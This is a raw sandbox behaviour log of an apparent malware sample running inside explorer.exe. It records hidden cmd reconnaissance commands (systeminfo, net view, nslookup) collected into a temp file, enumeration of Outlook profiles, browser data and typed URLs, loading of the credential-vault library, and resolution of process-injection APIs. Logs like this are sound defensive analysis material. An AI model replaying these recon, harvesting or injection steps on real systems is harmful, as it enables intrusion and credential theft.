Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace value_name = ValidateRegItems False 6
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace value_name = MonitorRegistry False 6
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\RemovableDrives value_name = ValidateRegItems False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\RemovableDrives value_name = MonitorRegistry False 1
Read Value Storage value_name = FilterMask, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced value_name = NeverShowDrivesMask, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced value_name = HideDrivesWithNoMedia, type = REG_NONE False 1
Read Value - data = Property System Both Class Factory True 1
Read Value - data = C:\Windows\system32\propsys.dll True 3
Read Value - type = REG_NONE False 2
Read Value - data = Local Thumbnail Cache True 1
Read Value - data = C:\Windows\System32\thumbcache.dll True 3
Read Value - data = Windows Search Platform True 2
Read Value - data = Home Group Member Status True 1
Read Value - data = C:\Windows\System32\provsvc.dll True 1
Read Value - data = Thumbnail Cache Class Factory for Out of Proc Server True 2
Read Value - data = Shell Oplock Provider True 1
Read Value - data = C:\Windows\system32\shcore.dll True 1
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings value_name = EnableSPDY3_0, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = {111F6A44-3C4D-6BC7-CED5-30CFE2D96473}, size = 8, type = REG_BINARY True 1
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = {36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}, size = 8, type = REG_BINARY True 1
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, size = 40, type = REG_BINARY True 2
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, size = 40, type = REG_BINARY True 2
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files value_name = 2A15B805C2DE35470F, size = 92, type = REG_BINARY True 1
Delete Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files value_name = 2A15B805C2DE35470F True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - False 1
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB) - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Main - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB) - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Uninstall - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB) - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3 - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3\bin - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3 - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3\extensions - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3 - False 1
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla - False 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - False 1
Enumerate Values HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files - True 1
Enumerate Values HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files - False 1
Process (593)
Operation Process Additional Information Success Count Logfile
Create cmd /C "systeminfo.exe > C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0xbf0, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Create makecab.exe /F "C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin" os_pid = 0x200, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Create cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0x198, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Create cmd /C "net view >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0x978, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Create cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0x86c, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Create cmd /C "nslookup 127.0.0.1 >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0x420, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Create cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0xa1c, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Get Info c:\windows\explorer.exe type = PROCESS_BASIC_INFORMATION True 586
Module (289)
Operation Module Additional Information Success Count Logfile
Load ntdll.dll base_address = 0x0 True 1
Load KERNEL32.dll base_address = 0x0 True 1
Load AVIFIL32.dll base_address = 0x0 True 1
Load ADVAPI32.dll base_address = 0x7ff976f80000 True 1
Load SHLWAPI.dll base_address = 0x7ff977360000 True 1
Load USER32.dll base_address = 0x7ff9757b0000 True 1
Load PSAPI.DLL base_address = 0x7ff977820000 True 1
Load ole32.dll base_address = 0x7ff977b60000 True 1
Load ADVAPI32.DLL base_address = 0x7ff976f80000 True 1
Load SHELL32.dll base_address = 0x7ff975900000 True 1
Load WININET.dll base_address = 0x7ff96b080000 True 1
Load vaultcli.dll base_address = 0x7ff968360000 True 1
Get Handle Unknown module name base_address = 0x7ff62aec0000 True 1
Get Handle KERNEL32.DLL base_address = 0x7ff977ab0000 True 5
Get Handle NTDLL.DLL base_address = 0x7ff977f30000 True 2
Get Handle kernelbase base_address = 0x7ff9753d0000 True 2
Get Handle ADVAPI32.DLL base_address = 0x7ff976f80000 True 3
Get Filename AVIFIL32.dll process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260 True 2
Get Address - function = NtCreateSection, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = NtUnmapViewOfSection, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = NtMapViewOfSection, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ZwOpenProcessToken, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ZwClose, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ZwQueryInformationToken, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ZwOpenProcess, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = NtQuerySystemInformation, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = RtlNtStatusToDosError, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ZwQueryInformationProcess, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = RtlImageDirectoryEntryToData, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = _wcsupr, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = _strupr, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = memmove, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = bsearch, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = _vsnwprintf, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = _strlwr, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = atoi, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = strstr, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = wcscpy, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ZwQueryKey, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = RtlFreeUnicodeString, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = sprintf, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = _snprintf, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = memset, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = memcpy, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = strcpy, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = RtlAdjustPrivilege, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = mbstowcs, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = RtlImageNtHeader, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = memcmp, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = __C_specific_handler, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = __chkstk, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetLocalTime, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = OpenProcess, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = VirtualQueryEx, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateRemoteThread, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetModuleFileNameW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetVersion, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = SetEndOfFile, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = RemoveDirectoryW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetTempFileNameA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = DeleteCriticalSection, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CloseHandle, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = WriteProcessMemory, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateFileA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = lstrcmpiA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetModuleFileNameA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetCurrentProcess, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = lstrcmpA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetModuleHandleA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateFileMappingA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = MapViewOfFile, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = Sleep, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GlobalLock, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = lstrlenA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GlobalAlloc, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GlobalUnlock, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = HeapAlloc, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = lstrcpyA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetLastError, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = HeapFree, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = RemoveDirectoryA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = DeleteFileA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = lstrcatA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = WriteFile, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateDirectoryA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = HeapDestroy, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = HeapCreate, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = SetEvent, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = HeapReAlloc, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetTickCount, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = FindNextFileW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CopyFileW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = SetWaitableTimer, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = LocalAlloc, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetCurrentThread, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetCurrentThreadId, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = lstrlenW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateEventA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetWindowsDirectoryA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = DeleteFileW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateDirectoryW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateWaitableTimerA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetTempPathA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = FindFirstFileW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = LocalFree, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = TerminateProcess, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = SuspendThread, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = WaitForMultipleObjects, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ResumeThread, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = lstrcpyW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = FileTimeToSystemTime, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateThread, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateFileW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ResetEvent, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = SwitchToThread, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = lstrcatW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateProcessW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetFileSize, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetFileAttributesW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = WideCharToMultiByte, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = LeaveCriticalSection, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = SetLastError, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = EnterCriticalSection, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetComputerNameA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateMutexA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = OpenWaitableTimerA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = OpenMutexA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetVolumeInformationA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = WaitForSingleObject, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ReleaseMutex, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetComputerNameW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = InitializeCriticalSection, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = LoadLibraryExW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = VirtualFree, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetFileAttributesA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = OpenFileMappingA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetExitCodeProcess, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateProcessA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = lstrcpynA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = LocalReAlloc, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = TlsAlloc, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = TlsGetValue, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = TlsSetValue, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = LoadLibraryW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetVersionExW, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = FreeLibrary, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ReadFile, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = SetFilePointer, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = Thread32First, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = QueueUserAPC, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = OpenThread, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = Thread32Next, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = FindFirstFileA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = FindNextFileA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = ConnectNamedPipe, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = GetOverlappedResult, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CancelIo, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = DisconnectNamedPipe, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = FlushFileBuffers, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CallNamedPipeA, ordinal = 0, address_out = 0x235f830 True 1
Get Address - function = CreateNamedPipeA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetSystemTime, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = WaitNamedPipeA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetCurrentProcessId, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = SleepEx, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = OpenEventA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrcmpiW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RaiseException, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetSystemInfo, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = Process32NextW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = Process32FirstW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = QueueUserWorkItem, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FindClose, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetDriveTypeW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = VirtualProtectEx, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIStreamRelease, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIStreamWrite, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileOpenA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileCreateStreamA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIStreamSetFormat, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileExit, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileInit, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIMakeCompressedStream, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileRelease, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address Unknown module name function = IsWow64Process, address_out = 0x7ff977ace960 True 1
Fn
Get Address Unknown module name function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x7ff976f9d610 True 1
Fn
Get Address Unknown module name function = StrRChrA, address_out = 0x7ff977374dd0 True 1
Fn
Get Address Unknown module name function = wsprintfA, address_out = 0x7ff9757d2610 True 1
Fn
